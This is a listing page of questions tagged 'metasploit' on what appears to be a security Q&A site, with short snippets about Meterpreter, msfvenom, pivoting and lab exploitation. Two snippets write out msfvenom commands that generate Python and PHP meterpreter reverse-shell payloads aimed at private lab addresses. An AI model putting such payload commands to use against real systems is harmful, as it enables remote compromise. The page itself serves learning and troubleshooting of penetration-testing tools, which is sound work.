Questions tagged [metasploit]
Metasploit is an open source exploitation framework that acts as a tool for developing and executing exploit code against a remote target machine
505 questions
1vote
0answers
578views
The "Shell" command does not work in Meterpreter [closed]
I would like to share the solution I have used in this issue Scenario: meterpreter > ? Stdapi: System Commands ======================= Command Description ------- ...
1vote
1answer
94views
How can I prevent msfvenom Python payloads from forking without manually decoding the payload?
I am generating a Python payload using msfvenom with the following command: msfvenom -p python/meterpreter_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=192.168.173.137 LPORT=...
0votes
0answers
329views
Cannot exploit Metasploitable 2 VM using Tomcat 5.5 on Metasploit with Parrot OS
I've being trying to perform a simple exploit with msfconsole on Metasploitable 2 without any results. I'm using a host-only network adapter with DHCP enabled so I'm getting 192.168.56.104 on the ...
0votes
0answers
104views
How can I safely write in my resume that I have written a MetaSploit exploit module without making employers nervous?
I have asked this question on The WorkPlace SE site and did not receive any comprehensive answers over there. I have around 10 years of cybersecurity industry experience and have gained proficiency ...
0votes
0answers
320views
Double pivoting - proxychains.conf - why should I use 2 entries?
I am studying pivoting and I had a question related to double pivoting. Reading various blogs, I read that it is a common (but not always used) practice to define two entries in the /etc/proxychains....
0votes
1answer
307views
Metasploit Payloads from outside the local network [duplicate]
I created a payload with metasploit and hacked my other computer. But this only works within the local network, right? I would like to know how hackers create payloads that work on targets outside the ...
0votes
1answer
148views
Using Metasploit on Kali to attack a Linux machine [closed]
Whats wrong with my exploit? I'm trying to attack a Linux machine using Kali. I cannot seem to get the meterpreter session started.
0votes
1answer
210views
How to embed a PE file to another PE files
So what I want to do basically is what BDFproxy does on the go, I want to modify a file (on the disk) to embed another PE in it and have both working, it does not matter if they work concurrently or ...
1vote
1answer
119views
Metasploit search features returns intersection of results
When I use multiple search criteria in Metasploit it shows the results as an "or" rather than an "and". I see that this was asked several years ago so now I am wondering if this ...
1vote
0answers
416views
exploit failed: nameerror undefined local variable or method `sysinfo' persistence service module error [closed]
Recently I have been facing an error while using Metasploit. I was trying to exploit Windows 7 with eternal-blue vulnerability. After creating a meterpreter session I was trying to maintain a ...
1vote
0answers
489views
Create and bind to Metasploit reverse shell on Apple Sillicon system
I'm trying to create a persistence module for OSX systems but first I need to create a reverse shell that spawns and binds on the same computer over a LAN. I'm having trouble creating an executable ...
0votes
1answer
837views
Metasploit - error msfvenom unloadable payload
I have been trying to generate a payload using msfvenom: msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.2.15 LPORT=1234 -f raw > shell.php I keep getting this error: "error: unloadable ...
0votes
1answer
182views
Arbitrary command execution on remote devices
Is it possible to send a TCP payload to an open port that executes a specific arbitrary command on the target device using Metasploit or any other program? For example with Windows 10 Server OS? I ...
2votes
1answer
414views
Does Routersploit install any malware or executables on my PC?
If I install Routersploit on my PC, would it install any malware or executable binaries as part of it to PC? Even though developers of Routersploit do not have any nefarious intention to add malware, ...
0votes
1answer
234views
metasploit smtp_enum: Testing different domain names
I'm testing my SMTP server using metasploit to see what information I can extract. Currently I'm trying to enumerate SMTP users using smtp_enum module. I've encountered a problem, the server ...